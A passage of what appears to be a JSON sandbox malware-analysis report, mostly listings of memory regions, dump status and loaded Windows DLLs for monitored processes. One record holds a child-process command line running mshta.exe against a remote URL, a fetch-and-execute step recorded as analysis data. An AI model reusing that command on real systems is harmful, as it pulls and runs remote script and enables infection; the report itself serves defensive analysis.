57212928, "type": "region", "version": 1 }, "end_va": 58261503, "entry_point": 0, "filename": null, "id": "region_1137", "name": "private_0x0000000003690000", "norm_filename": null, "region_type": "private_memory", "start_va": 57212928, "timestamp": "00:01:04.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791581261824, "type": "region", "version": 1 }, "end_va": 8791581319167, "entry_point": 8791581261824, "filename": "\\Windows\\System32\\msimtf.dll", "id": "region_1138", "name": "msimtf.dll", "norm_filename": "c:\\windows\\system32\\msimtf.dll", "region_type": "memory_mapped_file", "start_va": 8791581261824, "timestamp": "00:01:04.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092653568, "type": "region", "version": 1 }, "end_va": 8796092661759, "entry_point": 0, "filename": null, "id": "region_1139", "name": "private_0x000007fffffa6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092653568, "timestamp": "00:01:04.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 49741824, "type": "region", "version": 1 }, "end_va": 50790399, "entry_point": 0, "filename": null, "id": "region_1146", "name": "private_0x0000000002f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 49741824, "timestamp": "00:01:04.326", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 344064, "start_va": 8791566254080, "type": "region", "version": 1 }, "end_va": 8791566598143, "entry_point": 8791566258252, "filename": "\\Windows\\System32\\oleacc.dll", "id": "region_1147", "name": "oleacc.dll", "norm_filename": "c:\\windows\\system32\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 8791566254080, "timestamp": "00:01:04.327", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3477503, "entry_point": 3473408, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_1148", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 3473408, "timestamp": "00:01:04.329", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 593920, "start_va": 8791754342400, "type": "region", "version": 1 }, "end_va": 8791754936319, "entry_point": 8791754347584, "filename": "\\Windows\\System32\\sxs.dll", "id": "region_1153", "name": "sxs.dll", "norm_filename": "c:\\windows\\system32\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 8791754342400, "timestamp": "00:01:04.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 5705727, "entry_point": 0, "filename": null, "id": "region_1154", "name": "pagefile_0x0000000000570000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5701632, "timestamp": "00:01:04.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12283904, "start_va": 8791566647296, "type": "region", "version": 1 }, "end_va": 8791578931199, "entry_point": 8791566654424, "filename": "\\Windows\\System32\\ieframe.dll", "id": "region_1158", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 8791566647296, "timestamp": "00:01:04.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 5709823, "entry_point": 0, "filename": null, "id": "region_1159", "name": "pagefile_0x0000000000570000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5701632, "timestamp": "00:01:04.411", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0", "filename": "c:\\windows\\system32\\mshta.exe", "id": "proc_5", "image_name": "mshta.exe", "monitor_reason": "child_process", "monitored_id": 5, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000005-region_00000731-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_126", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_731", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:02.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_732", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:02.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_733", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:02.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_734", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:01:02.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_735", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:02.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_736", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:02.973", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000737-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_127", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_737", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:02.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 4288479232, "type": "region", "version": 1 }, "end_va": 4288544767, "entry_point": 4288490532, "filename": "\\Windows\\System32\\mshta.exe", "id": "region_738", "name": "mshta.exe", "norm_filename": "c:\\windows\\system32\\mshta.exe", "region_type": "memory_mapped_file", "start_va": 4288479232, "timestamp": "00:01:02.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_739", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:02.975", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_740", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:02.978", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000741-addr_0x000007fffffd3000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_128", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092841983, "entry_point": 0, "filename": null, "id": "region_741", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:01:02.978", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000742-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_129", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_742", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:02.978", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000743-addr_0x00000000002d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_130", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_743", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:01:02.983", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_744", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:02.983", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_745", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:02.984", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_746", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:03.000", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1798143, "entry_point": 1376256, "filename": "\\Windows\\System32\\locale.nls", "id": "region_747", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:01:03.000", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000748-addr_0x0000000000230000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_131", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2359295, "entry_point": 0, "filename": null, "id": "region_748", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:01:03.001", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000749-addr_0x00000000003d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_132", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_749", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:01:03.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_750", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:03.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_751", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:03.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_752", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:03.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_753", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:03.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_754", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:03.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_755", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:03.003", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000756-addr_0x0000000000630000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_133", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6488064, "type": "region", "version": 1 }, "end_va": 6553599, "entry_point": 0, "filename": null, "id": "region_756", "name": "private_0x0000000000630000", "norm_filename": null, "region_type": "private_memory", "start_va": 6488064, "timestamp": "00:01:03.005", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000757-addr_0x00000000004d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_134", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_757", "name": "private_0x00000000004d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5046272, "timestamp": "00:01:03.005", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9011200, "start_va": 8791270096896, "type": "region", "version": 1 }, "end_va": 8791279108095, "entry_point": 8791270096896, "filename": "\\Windows\\System32\\mshtml.dll", "id": "region_760", "name": "mshtml.dll", "norm_filename": "c:\\windows\\system32\\mshtml.dll", "region_type": "memory_mapped_file", "start_va": 8791270096896, "timestamp": "00:01:03.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_762", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:03.151", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_763", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:03.152", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_764", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:03.154", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_765", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:03.155", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_766", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:03.156", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_767", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:03.157", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1540096, "start_va": 8791768498176, "type": "region", "version": 1 }, "end_va": 8791770038271, "entry_point": 8791768502496, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_768", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 8791768498176, "timestamp": "00:01:03.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1220608, "start_va": 8791787438080, "type": "region", "version": 1 }, "end_va": 8791788658687, "entry_point": 8791787442388, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_769", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 8791787438080, "timestamp": "00:01:03.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_770", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:03.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2461696, "start_va": 8791763845120, "type": "region", "version": 1 }, "end_va": 8791766306815, "entry_point": 8791763850048, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_771", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 8791763845120, "timestamp": "00:01:03.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_772", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:03.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1470464, "start_va": 8791756374016, "type": "region", "version": 1 }, "end_va": 8791757844479, "entry_point": 8791756378304, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_773", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 8791756374016, "timestamp": "00:01:03.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791756046336, "type": "region", "version": 1 }, "end_va": 8791756107775, "entry_point": 8791756050464, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_774", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 8791756046336, "timestamp": "00:01:03.163", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 8791630807040, "type": "region", "version": 1 }, "end_va": 8791631048703, "entry_point": 8791630807040, "filename": "\\Windows\\System32\\msls31.dll", "id": "region_775", "name": "msls31.dll", "norm_filename": "c:\\windows\\system32\\msls31.dll", "region_type": "memory_mapped_file", "start_va": 8791630807040, "timestamp": "00:01:03.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_776", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:03.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 167936, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2002943, "entry_point": 1839120, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_777", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1835008, "timestamp": "00:01:03.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 8159231, "entry_point": 0, "filename": null, "id": "region_778", "name": "pagefile_0x0000000000640000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6553600, "timestamp": "00:01:03.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_780", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:03.175", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_781", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": 